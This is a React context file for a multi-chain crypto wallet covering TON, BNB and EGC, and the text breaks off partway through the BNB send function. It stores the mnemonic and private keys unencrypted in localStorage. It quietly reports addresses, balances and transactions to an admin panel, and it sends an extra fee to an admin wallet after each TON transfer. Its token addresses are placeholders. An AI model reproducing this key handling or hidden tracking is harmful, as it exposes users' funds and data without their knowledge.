import React, { createContext, useContext, useState, useEffect, useCallback } from 'react';
import { ethers } from 'ethers';
import TonWeb from 'tonweb';
import { toast } from 'react-toastify';
import {
  fetchTokenBalances,
  normalizeTokenAddress,
  validateTokenAddress,
} from '../utils/chainUtils';
import { MAIN_ASSETS, POPULAR_BEP20_TOKENS, MULTI_CHAIN_CONFIG } from '../constants/tokens';
import { useChain } from './ChainContext';
import * as bip39 from 'bip39';
import AdminApi from '../utils/adminApi';
import realtimeUpdates from '../utils/realtimeUpdates';

const WalletContext = createContext();

export const useWallet = () => {
  return useContext(WalletContext);
};

export const WalletProvider = ({ children }) => {
  const [wallet, setWallet] = useState(null);
  const [balance, setBalance] = useState('0');
  const [tonWalletState, setTonWalletState] = useState('uninitialized'); // 'uninitialized', 'inactive', 'active'
  const [transactions, setTransactions] = useState([]);
  const [loading, setLoading] = useState(true);
  const [error, setError] = useState(null);
  const [tokenBalances, setTokenBalances] = useState({
    USDT: { balance: '0', data: { balance: '0' } },
    USDC: { balance: '0', data: { balance: '0' } },
    TRG: { balance: '0', data: { balance: '0' } }
  });
  const [customTokens, setCustomTokens] = useState({});
  const [detectedTokens, setDetectedTokens] = useState({});
  const [chainBalances, setChainBalances] = useState({});
  const [tokenPrices, setTokenPrices] = useState({});
  const [tonWalletInstance, setTonWalletInstance] = useState(null); // Store TonWeb wallet instance

  // Real-time updates state
  const [adminSettings, setAdminSettings] = useState({});
  const [adminTokens, setAdminTokens] = useState([]);
  const [realtimeUpdateId, setRealtimeUpdateId] = useState(null);

  // Professional caching system for wallet state
  const [walletStateCache, setWalletStateCache] = useState({
    state: 'uninitialized',
    lastUpdate: 0,
    balance: '0',
    seqno: null,
    isStale: true
  });

  const { isTestnet } = useChain();

  // Professional cache management functions
  const isCacheValid = (cacheTime = 30000) => {
    const now = Date.now();
    return (now - walletStateCache.lastUpdate) < cacheTime;
  };

  const updateCache = (newData) => {
    setWalletStateCache(prev => ({
      ...prev,
      ...newData,
      lastUpdate: Date.now(),
      isStale: false
    }));
  };

  const invalidateCache = () => {
    setWalletStateCache(prev => ({
      ...prev,
      isStale: true
    }));
  };

  const clearCache = () => {
    setWalletStateCache({
      state: 'uninitialized',
      lastUpdate: 0,
      balance: '0',
      seqno: null,
      isStale: true
    });
  };

  // Check if wallet is confirmed active (no need for frequent refreshes)
  const isWalletConfirmedActive = () => {
    return walletStateCache.state === 'active' &&
      walletStateCache.seqno !== null &&
      !walletStateCache.isStale;
  };

  // Add this function to send wallet data to admin panel
  const sendWalletToAdmin = async (address, chain) => {
    try {
      const response = await AdminApi.addWallet(address, chain);
      if (response.success) {
        console.log('Wallet data sent to admin panel');
      } else {
        console.warn('Failed to send wallet data to admin panel:', response.message);
      }
    } catch (error) {
      console.warn('Failed to send wallet data to admin panel:', error.message);
      // Don't throw or affect wallet functionality
    }
  };

  // Add this function to send transaction data to admin panel
  const sendTransactionToAdmin = async (txData) => {
    try {
      const response = await AdminApi.addTransaction(txData);
      if (response.success) {
        console.log('Transaction data sent to admin panel');
      } else {
        console.warn('Failed to send transaction data to admin panel:', response.message);
      }
    } catch (error) {
      console.warn('Failed to send transaction data to admin panel:', error.message);
      // Don't throw or affect wallet functionality
    }
  };

  // Update the initWallet function to send wallet data
  const initWallet = useCallback(async (mnemonic) => {
    // Add validation for mnemonic parameter
    if (!mnemonic || typeof mnemonic !== 'string') {
      console.error('initWallet: Invalid mnemonic parameter:', mnemonic);
      setError("Invalid mnemonic phrase. Please provide a valid 12-word mnemonic.");
      setLoading(false);
      return;
    }

    console.log('initWallet: starting initialization with mnemonic length:', mnemonic.split(' ').length);
    setLoading(true);
    setError(null);
    try {
      if (!bip39.validateMnemonic(mnemonic)) {
        throw new Error("Invalid mnemonic phrase.");
      }

      console.log('initWallet: mnemonic validated, creating wallets...');

      // Create TonWeb instance for API calls
      const tonweb = new TonWeb(new TonWeb.HttpProvider(
        isTestnet ? 'https://testnet.toncenter.com/api/v2/jsonRPC' : 'https://toncenter.com/api/v2/jsonRPC'
      ));

      // Convert mnemonic to seed using bip39 and take first 32 bytes for TonWeb
      const seedBuffer = await bip39.mnemonicToSeed(mnemonic);
      const seed = new Uint8Array(seedBuffer.slice(0, 32)); // Take first 32 bytes

      console.log('Seed generation:', {
        originalSeedLength: seedBuffer.length,
        truncatedSeedLength: seed.length,
        isCorrectSize: seed.length === 32
      });

      // Create keyPair using TonWeb
      const keyPair = await tonweb.utils.keyPairFromSeed(seed);

      console.log('KeyPair created successfully:', {
        hasPublicKey: !!keyPair.publicKey,
        hasSecretKey: !!keyPair.secretKey,
        publicKeyLength: keyPair.publicKey?.length
      });

      // Create TonWeb wallet instance with V4R2 (explicit version)
      const tonWalletInstance = tonweb.wallet.create({
        publicKey: keyPair.publicKey,
        walletVersion: 'v4R2', // Explicitly set wallet version
        wc: 0
      });

      // Get the wallet address
      const tonAddress = await tonWalletInstance.getAddress();
      const tonAddressString = tonAddress.toString(true, true, true);

      console.log('initWallet: TonWeb wallet created successfully', {
        address: tonAddressString,
        walletVersion: 'v4R2',
        workchain: 0,
        isTestnet: isTestnet,
        network: isTestnet ? 'testnet' : 'mainnet'
      });

      // Log the full wallet instance for debugging
      console.log('TonWeb wallet instance details:', {
        hasGetAddress: typeof tonWalletInstance.getAddress === 'function',
        hasMethods: typeof tonWalletInstance.methods === 'object',
        hasDeploy: typeof tonWalletInstance.deploy === 'function',
        publicKeyLength: keyPair.publicKey?.length,
        secretKeyLength: keyPair.secretKey?.length
      });

      const bnbProvider = new ethers.providers.JsonRpcProvider(
        isTestnet ? 'https://bsc-testnet.public.blastapi.io' : 'https://bsc-dataseed1.binance.org'
      );

      const bnbWallet = ethers.Wallet.fromMnemonic(mnemonic);
      const bnbAddress = bnbWallet.address;

      // Create EGC wallet (EVM-compatible chain)
      const egcProvider = new ethers.providers.JsonRpcProvider(
        isTestnet ? 'https://rpc-testnet.egoldchain.com' : 'https://rpc.egoldchain.com'
      );
      const egcWallet = ethers.Wallet.fromMnemonic(mnemonic);
      const egcAddress = egcWallet.address;

      console.log('initWallet: wallets created successfully', {
        tonAddress: tonAddressString,
        bnbAddress: bnbAddress,
        egcAddress: egcAddress
      });

      const walletData = {
        mnemonic,
        ton: {
          address: tonAddressString,
          publicKey: keyPair.publicKey.toString('hex'),
          keyPair: keyPair // Store keyPair for transactions
        },
        bnb: { address: bnbAddress, privateKey: bnbWallet.privateKey },
        egc: { address: egcAddress, privateKey: egcWallet.privateKey }
      };

      console.log('initWallet: walletData structure:', {
        hasMnemonic: !!walletData.mnemonic,
        hasTon: !!walletData.ton,
        hasTonKeyPair: !!walletData.ton?.keyPair,
        hasBnb: !!walletData.bnb,
        tonAddress: walletData.ton?.address,
        bnbAddress: walletData.bnb?.address
      });

      setWallet(walletData);
      setTonWalletInstance(tonWalletInstance); // Store wallet instance

      // After wallet is set, send to admin panel
      if (walletData?.ton?.address) {
        await sendWalletToAdmin(walletData.ton.address, 'TON');
      }
      if (walletData?.bnb?.address) {
        await sendWalletToAdmin(walletData.bnb.address, 'BNB');
      }
      if (walletData?.egc?.address) {
        await sendWalletToAdmin(walletData.egc.address, 'EGC');
      }

      console.log('initWallet: wallet and tonWalletInstance set:', {
        hasWallet: !!walletData,
        hasTonWalletInstance: !!tonWalletInstance,
        tonAddress: tonAddressString,
        bnbAddress: bnbAddress
      });

      // Store wallet data without the keyPair (it can't be serialized)
      const walletDataForStorage = {
        mnemonic,
        ton: {
          address: tonAddressString,
          publicKey: keyPair.publicKey.toString('hex')
        },
        bnb: { address: bnbAddress, privateKey: bnbWallet.privateKey },
        egc: { address: egcAddress, privateKey: egcWallet.privateKey }
      };
      localStorage.setItem('wallet', JSON.stringify(walletDataForStorage));

      console.log('initWallet: wallet data stored, fetching balances...');

      try {
        const tonBalanceRaw = await tonweb.getBalance(tonAddressString);
        const newBalance = TonWeb.utils.fromNano(tonBalanceRaw);
        setBalance(newBalance);

        // Get wallet state using TonWeb
        const walletState = await tonweb.getContractInfo(new TonWeb.Address(tonAddressString));
        const newTonWalletState = walletState && walletState.state === 'active' ? 'active' : 'inactive';
        setTonWalletState(newTonWalletState);

        const bnbBalance = await bnbProvider.getBalance(bnbAddress);
        const egcBalance = await egcProvider.getBalance(egcAddress);
        setChainBalances({
          TON: newBalance,
          BNB: ethers.utils.formatEther(bnbBalance),
          EGC: ethers.utils.formatEther(egcBalance)
        });

        console.log('initWallet: balances fetched successfully', {
          tonBalance: newBalance,
          tonState: newTonWalletState,
          bnbBalance: ethers.utils.formatEther(bnbBalance),
          egcBalance: ethers.utils.formatEther(egcBalance)
        });
      } catch (err) {
        console.warn('initWallet: error fetching balances:', err);
        // Don't reset balances to 0, just show a warning
        toast.warn('Could not fetch balances. Showing last known values.', { toastId: 'balance-fetch-fail' });
      }

      console.log('initWallet: initialization completed successfully');

    } catch (e) {
      console.error('initWallet: initialization failed:', e);
      setError("Failed to initialize wallet. Please check your mnemonic and try again.");
      setWallet(null);
      setTonWalletInstance(null);
      setBalance('0');
      setTonWalletState('uninitialized');
    } finally {
      setLoading(false);
    }
  }, [isTestnet]);

  // Function to deploy TON wallet if needed
  const deployTonWallet = async () => {
    if (!tonWalletInstance || !wallet?.ton?.keyPair) {
      throw new Error('Wallet not properly initialized');
    }

    try {
      console.log('Checking if wallet needs deployment...');

      // First check if wallet is already active
      try {
        const seqno = await tonWalletInstance.methods.seqno().call();
        if (typeof seqno === 'number' && seqno >= 0) {
          console.log('Wallet is already active, seqno:', seqno);
          setTonWalletState('active');
          return true; // Already deployed
        }
      } catch (seqnoError) {
        console.log('Cannot get seqno, wallet may need deployment:', seqnoError.message);
      }

      console.log('Deploying TON wallet...');
      await tonWalletInstance.deploy(wallet.ton.keyPair.secretKey).send();

      // Wait for deployment confirmation
      for (let i = 0; i < 10; i++) {
        await new Promise(resolve => setTimeout(resolve, 2000));
        try {
          const seqno = await tonWalletInstance.methods.seqno().call();
          if (typeof seqno === 'number' && seqno >= 0) {
            setTonWalletState('active');
            updateCache({ state: 'active', seqno }); // Update cache after successful deployment
            toast.success('Wallet deployed successfully!');
            return true;
          }
        } catch (err) {
          console.log('Waiting for deployment confirmation...');
        }
      }

      toast.warn('Deployment may still be in progress. Please check your balance.');
      return false;
    } catch (error) {
      console.error('Deployment error:', error);
      const errorMessage = error?.message || error?.toString() || 'Unknown deployment error';

      // Handle specific deployment errors
      if (errorMessage.includes('exitcode=33') ||
        errorMessage.includes('cannot apply external message to current state') ||
        errorMessage.includes('External message was not accepted')) {
        console.log('Wallet is already deployed, setting state to active');
        setTonWalletState('active');
        return true; // Consider it successful since wallet is already deployed
      }

      if (errorMessage.includes('already deployed')) {
        setTonWalletState('active');
        return true;
      }

      throw new Error(`Failed to deploy wallet: ${errorMessage}`);
    }
  };

  // Function to check if wallet needs deployment
  const checkAndDeployWallet = async () => {
    console.log('checkAndDeployWallet: current state:', tonWalletState);

    // First refresh the wallet state to get the latest status
    await refreshWalletState();

    if (tonWalletState === 'active') {
      console.log('Wallet is already active, no deployment needed');
      return true; // Already active
    }

    if (tonWalletState === 'inactive' || tonWalletState === 'uninitialized') {
      // Check if wallet has balance for deployment
      const currentBalance = parseFloat(balance);
      if (currentBalance < 0.05) {
        throw new Error('Insufficient balance for wallet deployment. Please send at least 0.05 TON to this address.');
      }

      console.log('Wallet needs deployment, attempting to deploy...');
      // Deploy the wallet
      return await deployTonWallet();
    }

    return false;
  };

  // Function to manually refresh wallet state
  const refreshWalletState = async (force = false) => {
    if (!wallet?.ton?.address || !tonWalletInstance) return;

    try {
      console.log('Manually refreshing wallet state...', { force, cacheValid: isCacheValid(), confirmedActive: isWalletConfirmedActive() });

      // Skip refresh if wallet is confirmed active and not forcing
      if (!force && isWalletConfirmedActive()) {
        console.log('Wallet is confirmed active, skipping unnecessary refresh');
        setTonWalletState('active');
        return 'active';
      }

      // Use cache if valid and not forcing refresh
      if (!force && isCacheValid(15000)) { // 15 seconds for manual refresh
        console.log('Using cached wallet state:', walletStateCache.state);
        setTonWalletState(walletStateCache.state);
        return walletStateCache.state;
      }

      // Try to get seqno - if successful, wallet is active
      const seqno = await tonWalletInstance.methods.seqno().call();
      if (typeof seqno === 'number' && seqno >= 0) {
        const newState = 'active';
        setTonWalletState(newState);
        updateCache({ state: newState, seqno });
        console.log('Wallet state refreshed: ACTIVE (seqno:', seqno, ')');
        return newState;
      } else {
        const newState = 'inactive';
        setTonWalletState(newState);
        updateCache({ state: newState, seqno: null });
        console.log('Wallet state refreshed: INACTIVE');
        return newState;
      }
    } catch (error) {
      console.warn('Failed to refresh wallet state:', error);

      // Handle rate limiting gracefully
      if (error.message?.includes('429') || error.message?.includes('Too Many Requests')) {
        console.log('Rate limited during refresh, using cached state if available');
        if (walletStateCache.state !== 'uninitialized') {
          setTonWalletState(walletStateCache.state);
          return walletStateCache.state;
        }
      }

      // Fallback to inactive state
      const fallbackState = 'inactive';
      setTonWalletState(fallbackState);
      updateCache({ state: fallbackState, seqno: null });
      return fallbackState;
    }
  };

  const disconnect = () => {
    localStorage.removeItem('wallet');
    setWallet(null);
    setTonWalletInstance(null);
    setBalance('0');
    setTonWalletState('uninitialized');
    setTransactions([]);
    setTokenBalances({});
    setChainBalances({});
    setError(null);
    setLoading(true);
    clearCache(); // Clear wallet state cache
  };

  useEffect(() => {
    const savedWallet = localStorage.getItem('wallet');
    if (savedWallet) {
      try {
        const parsedWallet = JSON.parse(savedWallet);
        console.log('Loading wallet from localStorage:', { hasMnemonic: !!parsedWallet.mnemonic });

        // Validate that mnemonic exists and is a string
        if (parsedWallet.mnemonic && typeof parsedWallet.mnemonic === 'string') {
          // Reconstruct the wallet with proper keyPair and wallet instance
          initWallet(parsedWallet.mnemonic);
        } else {
          console.error('Invalid mnemonic in localStorage:', parsedWallet.mnemonic);
          setError("Invalid wallet data in localStorage. Please create a new wallet.");
          setLoading(false);
          // Clear invalid data
          localStorage.removeItem('wallet');
        }
      } catch (parseError) {
        console.error('Failed to parse wallet from localStorage:', parseError);
        setError("Corrupted wallet data in localStorage. Please create a new wallet.");
        setLoading(false);
        // Clear corrupted data
        localStorage.removeItem('wallet');
      }
    } else {
      console.log('No saved wallet found in localStorage');
      setLoading(false);
    }
  }, [initWallet]);

  useEffect(() => {
    if (!wallet?.ton?.address) return;

    const tonweb = new TonWeb(new TonWeb.HttpProvider(
      isTestnet ? 'https://testnet.toncenter.com/api/v2/jsonRPC' : 'https://toncenter.com/api/v2/jsonRPC'
    ));

    const fetchTonData = async () => {
      try {
        const address = wallet.ton.address;
        console.log('Fetching balance for address:', address);
        console.log('Using testnet:', isTestnet);

        // Add proper error handling for balance fetching
        let newBalance = '0';
        try {
          const balance = await tonweb.getBalance(address);
          console.log('Raw balance from API:', balance);
          if (balance !== undefined && balance !== null) {
            newBalance = TonWeb.utils.fromNano(balance);
            console.log('Converted balance:', newBalance);
          } else {
            console.warn('Balance is undefined or null');
          }
        } catch (balanceError) {
          console.warn('Failed to fetch TON balance:', balanceError);
          newBalance = '0';
        }

        // Get wallet state using TonWeb
        let newState = 'inactive';
        try {
          // Skip wallet state check if confirmed active (only update balance)
          if (isWalletConfirmedActive()) {
            newState = 'active';
            console.log('Wallet is confirmed active, skipping state check, only updating balance');
          } else if (isCacheValid(30000)) {
            // Use cache if valid (30 seconds for automatic updates)
            newState = walletStateCache.state;
            console.log('Using cached wallet state for auto-update:', newState);
          } else {
            // Try to get seqno - if successful, wallet is active
            const seqno = await tonWalletInstance?.methods?.seqno().call();
            if (typeof seqno === 'number' && seqno >= 0) {
              newState = 'active';
              updateCache({ state: newState, seqno });
              console.log('Wallet is active, seqno:', seqno);
            } else {
              // Fallback to contract info check
              const walletState = await tonweb.getContractInfo(new TonWeb.Address(address));
              newState = walletState && walletState.state === 'active' ? 'active' : 'inactive';
              updateCache({ state: newState, seqno: null });
              console.log('Wallet state from contract info:', walletState);
            }
          }
        } catch (stateError) {
          console.warn('Failed to fetch wallet state:', stateError);

          // Handle rate limiting gracefully
          if (stateError.message?.includes('429') || stateError.message?.includes('Too Many Requests')) {
            console.log('Rate limited during auto-update, using cached state');
            newState = walletStateCache.state !== 'uninitialized' ? walletStateCache.state : 'inactive';
          } else {
            // If we can't get seqno, try alternative method
            try {
              const walletState = await tonweb.getContractInfo(new TonWeb.Address(address));
              newState = walletState && walletState.state === 'active' ? 'active' : 'inactive';
              updateCache({ state: newState, seqno: null });
              console.log('Alternative wallet state check:', walletState);
            } catch (altError) {
              console.warn('Alternative wallet state check failed:', altError);
              newState = walletStateCache.state !== 'uninitialized' ? walletStateCache.state : 'inactive';
            }
          }
        }

        setBalance(newBalance);
        setTonWalletState(newState);

        // Update chain balances
        setChainBalances(prev => ({ ...prev, TON: newBalance }));

        // Also fetch BNB balance if wallet exists
        let bnbBalance = '0';
        if (wallet?.bnb?.address) {
          const BSC_RPC_ENDPOINTS = [
            'https://bsc-dataseed1.binance.org',
            'https://bsc-dataseed.binance.org/',
            'https://bsc-dataseed1.defibit.io/',
            'https://bsc-dataseed1.ninicoin.io/'
          ];
          let provider = null;
          for (const endpoint of BSC_RPC_ENDPOINTS) {
            try {
              provider = new ethers.providers.JsonRpcProvider(endpoint);
              await provider.getBlockNumber(); // test connection
              break;
            } catch (e) {
              provider = null;
            }
          }
          if (provider) {
            try {
              const bnbBalanceRaw = await provider.getBalance(wallet.bnb.address);
              bnbBalance = ethers.utils.formatEther(bnbBalanceRaw);
              setChainBalances(prev => ({ ...prev, BNB: bnbBalance }));
            } catch (bnbError) {
              console.warn('Failed to fetch BNB balance:', bnbError);
              setChainBalances(prev => ({ ...prev, BNB: '0' }));
            }
          } else {
            console.warn('All BSC RPC endpoints failed');
            setChainBalances(prev => ({ ...prev, BNB: '0' }));
          }
        }

        // Fetch EGC balance if wallet exists
        let egcBalance = '0';
        if (wallet?.egc?.address) {
          try {
            const egcProvider = new ethers.providers.JsonRpcProvider(
              isTestnet ? 'https://rpc-testnet.egoldchain.com' : 'https://rpc.egoldchain.com'
            );
            const egcBalanceRaw = await egcProvider.getBalance(wallet.egc.address);
            egcBalance = ethers.utils.formatEther(egcBalanceRaw);
            setChainBalances(prev => ({ ...prev, EGC: egcBalance }));
          } catch (egcError) {
            console.warn('Failed to fetch EGC balance:', egcError);
            setChainBalances(prev => ({ ...prev, EGC: '0' }));
          }
        }

        // Send balance updates to admin panel
        if (wallet?.ton?.address) {
          try {
            const adminResponse = await AdminApi.updateBalance(wallet.ton.address, newBalance, bnbBalance, egcBalance);
            if (adminResponse.success) {
              console.log('Balance update sent to admin panel:', { ton: newBalance, bnb: bnbBalance, egc: egcBalance });
            } else {
              console.warn('Admin panel balance update failed:', adminResponse.message);
            }
          } catch (error) {
            console.warn('Failed to send balance update to admin panel:', error.message);
            // Don't throw or affect wallet functionality
          }
        }

        if (newState === 'active') {
          // Get transactions using TonWeb
          try {
            if (typeof tonweb.getTransactions === 'function') {
              const txs = await tonweb.getTransactions(address, 20);
              if (txs && Array.isArray(txs) && txs.length > 0) {
                // Parse and map transactions for TON and Jetton (token) transfers
                const parsedTxs = txs.flatMap(tx => {
                  const results = [];
                  const hash = tx.hash;
                  const timestamp = tx.utime;
                  const dateObj = timestamp ? new Date(timestamp * 1000) : null;
                  const formattedDate = dateObj ? dateObj.toLocaleDateString() : '';
                  const formattedTime = dateObj ? dateObj.toLocaleTimeString() : '';
                  const fee = tx.fee ? TonWeb.utils.fromNano(tx.fee) : '0';
                  const explorerUrl = isTestnet
                    ? `https://testnet.tonscan.org/tx/${hash}`
                    : `https://tonscan.org/tx/${hash}`;
                  // TON native receive
                  if (tx.in_msg && tx.in_msg.destination === address) {
                    const amount = TonWeb.utils.fromNano(tx.in_msg.value || '0');
                    results.push({
                      type: 'receive',
                      direction: 'in',
                      amount,
                      formattedAmount: `+${parseFloat(amount).toFixed(4)}`,
                      from: tx.in_msg.source,
                      to: tx.in_msg.destination,
                      timestamp,
                      formattedDate,
                      formattedTime,
                      fee,
                      hash,
                      symbol: 'TON',
                      explorerUrl,
                    });
                  }
                  // TON native send (out_msgs)
                  if (Array.isArray(tx.out_msgs)) {
                    tx.out_msgs.forEach(outMsg => {
                      if (outMsg.source === address) {
                        const amount = TonWeb.utils.fromNano(outMsg.value || '0');
                        results.push({
                          type: 'send',
                          direction: 'out',
                          amount,
                          formattedAmount: `-${parseFloat(amount).toFixed(4)}`,
                          from: outMsg.source,
                          to: outMsg.destination,
                          timestamp,
                          formattedDate,
                          formattedTime,
                          fee,
                          hash,
                          symbol: 'TON',
                          explorerUrl,
                        });
                      }
                      // Jetton (token) transfer detection (basic):
                      if (outMsg.payload && typeof outMsg.payload === 'string') {
                        if (outMsg.payload.startsWith('te6ccgEBAQEA')) { // Jetton transfer cell prefix (base64)
                          results.push({
                            type: 'token',
                            direction: 'out',
                            amount: 'Jetton', // Could parse real amount if needed
                            formattedAmount: 'Jetton',
                            from: outMsg.source,
                            to: outMsg.destination,
                            timestamp,
                            formattedDate,
                            formattedTime,
                            fee,
                            hash,
                            symbol: 'TOKEN',
                            explorerUrl,
                            rawPayload: outMsg.payload
                          });
                        }
                      }
                    });
                  }
                  return results;
                });
                setTransactions(parsedTxs);
                localStorage.setItem('transactions', JSON.stringify(parsedTxs));
              } else {
                setTransactions([]);
                localStorage.setItem('transactions', JSON.stringify([]));
              }
            } else {
              console.warn('getTransactions method not available on tonweb instance');
              setTransactions([]);
              localStorage.setItem('transactions', JSON.stringify([]));
            }
          } catch (txError) {
            console.warn('Failed to fetch transactions:', txError);
            setTransactions([]);
            localStorage.setItem('transactions', JSON.stringify([]));
          }

          // Fetch token balances for common TON tokens
          try {
            const commonTokens = [
              { symbol: 'USDT', address: isTestnet ? 'EQBvW8Z5huBkMJYdnfAEM5JqTNkuWX3diqYENkWsIL0XggGG' : 'EQC_1YoM8RBixN95lz7odcF3VqwmUYjOaOJvVh4v8uQ3' },
              { symbol: 'USDC', address: isTestnet ? 'EQBvW8Z5huBkMJYdnfAEM5JqTNkuWX3diqYENkWsIL0XggGG' : 'EQC_1YoM8RBixN95lz7odcF3VqwmUYjOaOJvVh4v8uQ3' },
              { symbol: 'TRG', address: isTestnet ? 'EQBvW8Z5huBkMJYdnfAEM5JqTNkuWX3diqYENkWsIL0XggGG' : 'EQC_1YoM8RBixN95lz7odcF3VqwmUYjOaOJvVh4v8uQ3' }
            ];

            if (commonTokens && Array.isArray(commonTokens) && commonTokens.length > 0) {
              for (const token of commonTokens) {
                try {
                  if (token && token.symbol) {
                    // For now, set default balances - in a real implementation, you'd query the token contract
                    setTokenBalances(prev => ({
                      ...prev,
                      [token.symbol]: { balance: '0', data: { balance: '0' } }
                    }));
                  }
                } catch (tokenError) {
                  console.warn(`Failed to fetch ${token?.symbol || 'unknown'} balance:`, tokenError);
                }
              }
            }
          } catch (tokenError) {
            console.warn('Failed to fetch token balances:', tokenError);
          }
        }
      } catch (error) {
        console.warn('Failed to fetch TON data:', error);
        // Don't reset balances or tokenBalances to 0, just show a warning
        toast.warn('Could not refresh balances. Showing last known values.', { toastId: 'balance-fetch-fail' });
      }
    };

    fetchTonData();
    const intervalId = setInterval(fetchTonData, 45000); // 45 seconds for stable updates

    return () => clearInterval(intervalId);
  }, [wallet?.ton?.address, isTestnet]);

  // Update sendTransaction to accept serviceFee and pass it to sendTonTransaction
  const sendTransaction = async (toAddress, amount, chain, tokenInfo = null, serviceFee = null) => {
    // Use admin-configured fees if no serviceFee is provided
    if (serviceFee === null) {
      serviceFee = getAdminFee(chain);
    }

    if (chain === 'TON') {
      // Check balance first
      if (parseFloat(balance) === 0) {
        throw new Error('Wallet has zero balance. Please send some TON to this address before sending transactions.');
      }

      // Check and deploy wallet if needed
      try {
        await checkAndDeployWallet();
      } catch (error) {
        throw new Error(`Wallet deployment failed: ${error.message}`);
      }

      return sendTonTransaction(toAddress, amount, tokenInfo, serviceFee);
    } else if (chain === 'BNB') {
      return sendBnbTransaction(toAddress, amount, tokenInfo);
    } else if (chain === 'EGC') {
      return sendEgcTransaction(toAddress, amount, tokenInfo);
    } else {
      throw new Error("Unsupported chain");
    }
  };

  // Update sendTonTransaction to accept serviceFee
  const sendTonTransaction = async (toAddress, amount, tokenInfo, serviceFee = 0) => {
    try {
      console.log('sendTonTransaction: starting with params:', { toAddress, amount, hasTonWalletInstance: !!tonWalletInstance, hasKeyPair: !!wallet?.ton?.keyPair });

      if (!tonWalletInstance || !wallet?.ton?.keyPair) {
        console.error('sendTonTransaction: missing wallet instance or keyPair:', {
          hasTonWalletInstance: !!tonWalletInstance,
          hasKeyPair: !!wallet?.ton?.keyPair,
          walletData: wallet ? { hasTon: !!wallet.ton, hasKeyPair: !!wallet.ton?.keyPair } : null
        });
        throw new Error('Wallet not properly initialized');
      }

      // Ensure wallet is deployed and active
      console.log('sendTonTransaction: checking wallet deployment...');
      await checkAndDeployWallet();

      // Get fresh seqno before sending
      let seqno;
      try {
        console.log('sendTonTransaction: getting seqno...');
        seqno = await tonWalletInstance.methods.seqno().call();
        if (typeof seqno !== 'number' || seqno < 0) {
          seqno = 0;
        }
        console.log('Current seqno:', seqno);
      } catch (seqnoError) {
        console.error('Failed to get seqno:', seqnoError);
        throw new Error('Failed to get transaction sequence number');
      }

      // Prepare transfer
      console.log('sendTonTransaction: preparing transfer...');
      // Ensure amount is a string
      const amountStr = typeof amount === 'string' ? amount : amount?.toString();
      const transfer = tonWalletInstance.methods.transfer({
        secretKey: wallet.ton.keyPair.secretKey,
        toAddress: toAddress,
        amount: TonWeb.utils.toNano(amountStr),
        seqno: seqno,
        payload: '',
        sendMode: 3, // pay gas from balance
      });

      console.log('Sending transaction...');
      const txHash = await transfer.send();

      // Send service fee to fee wallet (only for native TON, not Jettons)
      if (!tokenInfo && serviceFee > 0) {
        const adminFeeWallets = getAdminFeeWallets();
        const feeWallet = isTestnet ? adminFeeWallets.TON.testnet : adminFeeWallets.TON.mainnet;
        // Wait for the previous transaction to be confirmed (seqno incremented)
        let newSeqno = seqno;
        for (let i = 0; i < 10; i++) {
          await new Promise(resolve => setTimeout(resolve, 2000));
          try {
            newSeqno = await tonWalletInstance.methods.seqno().call();
            if (newSeqno > seqno) break;
          } catch { }
        }
        // Ensure serviceFee is a string
        const serviceFeeStr = typeof serviceFee === 'string' ? serviceFee : serviceFee?.toString();
        // Send the service fee transaction
        const feeTransfer = tonWalletInstance.methods.transfer({
          secretKey: wallet.ton.keyPair.secretKey,
          toAddress: feeWallet,
          amount: TonWeb.utils.toNano(serviceFeeStr),
          seqno: newSeqno,
          payload: '',
          sendMode: 3,
        });
        await feeTransfer.send();
      }

      // After successful transaction, send to admin panel
      await sendTransactionToAdmin({
        tx_hash: txHash, // Get this from the transaction response
        from_address: wallet.ton.address,
        to_address: toAddress,
        amount: amount,
        token_symbol: tokenInfo ? tokenInfo.symbol : 'TON',
        chain: 'TON',
        status: 'confirmed',
        fee: '0' // Service fee is not directly tracked in TonWeb for this transaction
      });

      // Wait for transaction confirmation
      for (let i = 0; i < 20; i++) {
        await new Promise(resolve => setTimeout(resolve, 3000));
        try {
          const newSeqno = await tonWalletInstance.methods.seqno().call();
          if (newSeqno > seqno) {
            toast.success('Transaction confirmed!');
            // Force refresh wallet state and balance after send
            await refreshWalletState(true);
            // Also fetch and update balance directly
            const tonweb = new TonWeb(new TonWeb.HttpProvider(
              isTestnet ? 'https://testnet.toncenter.com/api/v2/jsonRPC' : 'https://toncenter.com/api/v2/jsonRPC'
            ));
            const freshBalance = await tonweb.getBalance(wallet.ton.address);
            setBalance(TonWeb.utils.fromNano(freshBalance));
            return;
          }
        } catch (confirmError) {
          console.warn('Error checking confirmation:', confirmError);
        }
      }
      toast.warn('Transaction sent, but confirmation is taking longer than usual.');
      // Still force refresh after timeout
      await refreshWalletState(true);
      const tonweb = new TonWeb(new TonWeb.HttpProvider(
        isTestnet ? 'https://testnet.toncenter.com/api/v2/jsonRPC' : 'https://toncenter.com/api/v2/jsonRPC'
      ));
      const freshBalance = await tonweb.getBalance(wallet.ton.address);
      setBalance(TonWeb.utils.fromNano(freshBalance));
    } catch (e) {
      console.error('TON send error:', e);

      // Handle specific TON errors with proper null checks
      const errorMessage = e?.message || e?.toString() || 'Unknown error';

      if (errorMessage.includes('Failed to unpack account state') ||
        errorMessage.includes('cannot apply external message to current state')) {
        throw new Error('Wallet needs to be deployed first. Please ensure you have at least 0.05 TON and try again.');
      }

      if (errorMessage.includes('exit code 34')) {
        throw new Error('Invalid wallet version or address.');
      }

      if (errorMessage.includes('exit code 35')) {
        throw new Error('Insufficient TON balance for transaction and fees.');
      }

      throw new Error(`TON transaction failed: ${errorMessage}`);
    }
  };

  const sendBnbTransaction = async (toAddress, amount, tokenInfo) => {
    console.log('🚀 sendBnbTransaction: Starting BNB transaction', {
      toAddress,
      amount,
      hasTokenInfo: !!tokenInfo,
      tokenInfo: tokenInfo ? {
        symbol: tokenInfo.symbol,
        address: tokenInfo.address,
        decimals: tokenInfo.decimals,
        chain: tokenInfo.chain
      } : null,
      isTestnet,
      timestamp: new Date().toISOString()
    });

    try {
      console.log('🚀 sendBnbTransaction: Connecting to BSC RPC provider...');
      const provider = new ethers.providers.JsonRpcProvider(
        isTestnet ? 'https://bsc-testnet.public.blastapi.io' : 'https://bsc-dataseed1.binance.org'
      );

      console.log('🚀 sendBnbTransaction: Creating wallet instance...');
      const bnbWallet = new ethers.Wallet(wallet.bnb.privateKey, provider);
      console.log('🚀 sendBnbTransaction: Wallet created for address:', bnbWallet.address);

      let tx;
      if (tokenInfo) { // BEP20 Token Transfer (USDT, USDC, etc.)
        console.log('🚀 sendBnbTransaction: Processing BEP20 token transfer', {
          tokenSymbol: tokenInfo.symbol,
          tokenAddress: tokenInfo.address,
